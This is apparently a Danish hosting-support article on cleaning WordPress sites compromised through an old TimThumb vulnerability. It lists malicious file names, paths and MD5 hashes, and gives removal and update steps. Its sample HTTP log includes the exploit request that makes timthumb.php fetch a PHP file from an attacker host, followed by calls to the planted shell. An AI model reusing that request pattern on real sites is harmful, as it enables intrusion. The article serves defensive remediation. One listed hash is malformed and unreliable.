WordPress-sikkerhedsbrud: TimThumb

TimThumb er et værktøj, der anvendes i WordPress-temaer og -plugins til at ændre størrelser på billeder. Gamle versioner af TimThumb har en sikkerhedsbrist, der gør det muligt for angribende parter at uploade skadelige ("ondsindede") filer fra et andet website. Den første ondsindede fil giver derefter den angribende part mulighed for at uploade flere skadelige filer til hostingkontoen.

Du kan få yderligere oplysninger om sikkerhedsbrud, og om hvordan du håndterer dem, i Hvad gør jeg, hvis mit website er blevet hacket?.

Tegn på, at dit site har være udsat for et sikkerhedsbrud

Foruden de tegn, der er anført i Hvad gør jeg, hvis mit website er blevet hacket?, kan du se, om dit site er inficeret af dette specifikke sikkerhedsbrud, ved at undersøge, om din konto indeholder filer med følgende mønstre i en plugin-mappe:

  • ekstern_[md5 hash].php – f.eks.: ekstern_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php – f.eks.: 7eebe45bde5168488ac4010f0d65cea8.php

Du kan se eksempler på mulige MD5-hashværdier i afsnittet MD5SUMS over kendte skadelige filer i denne artikel.

Du kan muligvis også finde følgende filer i dit websites rodmappe (flere oplysninger):

  • x.txt
  • logx.txt

Afhjælpning

Du skal fjerne alle filer, der har været genstand for sikkerhedsbrud, og alle øvrige ondsindede filer. Før du sletter noget, anbefaler vi, at du laver en sikkerhedskopi af dit website (flere oplysninger).

Sådan lokaliserer du ondsindede filer

De ondsindede filer, der til at starte med uploades via en sikkerhedsbrist i TimThumb, befinder sig typisk på en af følgende placeringer, der findes i den /tema- eller /plugin-mappe, som indeholder TimThumb-filen med sikkerhedsbristen.

  • /tmp
  • /cache
  • /images

Eksempler på ondsindede filers placering:

[webroot]/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/

Eksempler på ondsindede filers navne i disse placeringer:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Filerne x.txt og logx.txt inderholder oplysninger om, hvornår en ondsindet fil blev oprettet via TimThumb-sikkerhedsbristen samt den ondsindede fils placering på hostingkontoen. Disse oplysninger er nyttige, når du skal finde ud af, hvilke filer der skal fjernes, og hvor de findes. Det er imidlertid ikke sandsynligt, at dette udgør en udtømmende liste over, hvilke filer der skal fjernes.

Et eksempel:

Dag: Tor, 11. april 2013 06:21:15 – 0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[theme with vulnerable TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Filer, der skal fjernes

Når du har lavet en sikkerhedskopi af dit website, skal du fjerne følgende filer:

  • x.txt
  • logx.txt
  • ekstern_[md5 hash].php – f.eks.: ekstern_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php – f.eks.: 7eebe45bde5168488ac4010f0d65cea8.php
  • Der blev fundet andre skadelige PHP-filer i filerne navngivet med MD5-hash.

Du kan gøre dette via FTP (flere oplysninger) eller ved hjælp af filhåndteringsfunktionen i hostingkontoens kontrolpanel (flere oplysninger).

Du skal desuden:

  • Opdatere alle dine temaer og plugins til de nyeste versioner.
  • Erstatte alle forekomster af TimThumb.php med den nyeste version, som du finder her.

Tekniske oplysninger

Eksempler på HTTP-log

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5SUMS for kendte skadelige filer

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Yderligere skadelige filer

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Hjalp denne artikel?
Tak for din feedback. Benyt telefonnummeret til support eller chat-funktionen ovenfor, hvis du vil tale med en kundeservicerepræsentant.
Det glæder os, at vi kunne hjælpe! Er der andet, vi kan gøre for dig?
Beklager. Fortæl os, hvad du fandt forvirrende, eller hvorfor løsningen ikke løste dit problem.